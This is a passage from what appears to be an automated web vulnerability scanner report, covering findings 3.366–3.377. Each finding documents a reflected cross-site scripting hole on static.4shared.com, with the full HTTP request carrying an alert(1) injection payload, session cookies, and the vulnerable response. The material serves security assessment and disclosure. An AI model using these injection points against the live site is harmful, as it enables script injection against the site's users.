Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles163b1&quot;-alert(1)-&quot;297eae2c019/css/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CFEBAD46D8406FDC60AABD88429B07B6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
fu
...[SNIP]...

3.366. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f3d"-alert(1)-"0dd0c41e0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css30f3d&quot;-alert(1)-&quot;0dd0c41e0d3/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2891AA2AF3FD3761E519E71601B78FFD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functi
...[SNIP]...

3.367. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b65f"-alert(1)-"5a3a52c1156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles9b65f&quot;-alert(1)-&quot;5a3a52c1156/css/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F821921AEC084A71599799BE7EB3C302.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.368. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b9ab"-alert(1)-"dee60659f4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css3b9ab&quot;-alert(1)-&quot;dee60659f4a/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2401037377E5C602B65A37F6FB87A0F2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.369. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76573"-alert(1)-"ec03b530299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles76573&quot;-alert(1)-&quot;ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A9839C8DEFBDA68BADCFD7665FEA8D0.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:52 GMT
Content-Length: 36369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();

...[SNIP]...

3.370. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e355f"-alert(1)-"c59a7821a20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/csse355f&quot;-alert(1)-&quot;c59a7821a20/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7B5D4E113620780EF4F857D96ACFA259.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:57 GMT
Content-Length: 36358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.371. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ccb7"-alert(1)-"03ea243a2a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles9ccb7&quot;-alert(1)-&quot;03ea243a2a2/js/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E38EA5308504D5C33D6DD7767A3BD57.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:31 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

3.372. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da92"-alert(1)-"7b78290c6f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/js4da92&quot;-alert(1)-&quot;7b78290c6f9/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C39C846DD17D85C176855BA695E2C4C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:36 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
func
...[SNIP]...

3.373. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4d2"-alert(1)-"5f2a71056a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundlesbb4d2&quot;-alert(1)-&quot;5f2a71056a9/js/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD429EE8057B85C86EB3CF8CBFD9A936.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:06 GMT
Content-Length: 36338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.374. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83dc7"-alert(1)-"5295142c7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/js83dc7&quot;-alert(1)-&quot;5295142c7b1/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB763FE317659EF84EDC6A27F3F97ABD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.375. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/4shFeatures.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a532a"-alert(1)-"56c404f6318 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa532a"-alert(1)-"56c404f6318/4shFeatures.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa532a&quot;-alert(1)-&quot;56c404f6318/4shFeatures.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEF9E6303AEEAD94CE76A913B1A2F00C.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa532a"-alert(1)-"56c404f6318/4shFeatures.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.376. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/4shFeatures.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf1b"-alert(1)-"8d2f34b5bc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/4shFeatures.cssfaf1b&quot;-alert(1)-&quot;8d2f34b5bc1
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C45CCF983AA74A4AF3418259238DAC27.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:19 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.377. http://static.4shared.com/css/common.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498ae"-alert(1)-"582fd7f25e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css498ae"-alert(1)-"582fd7f25e7/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css498ae&quot;-alert(1)-&quot;582fd7f25e7/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=902A375A6F87ECE1509A04F2E46DBA86.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:24 GMT
Content-Length: 36165


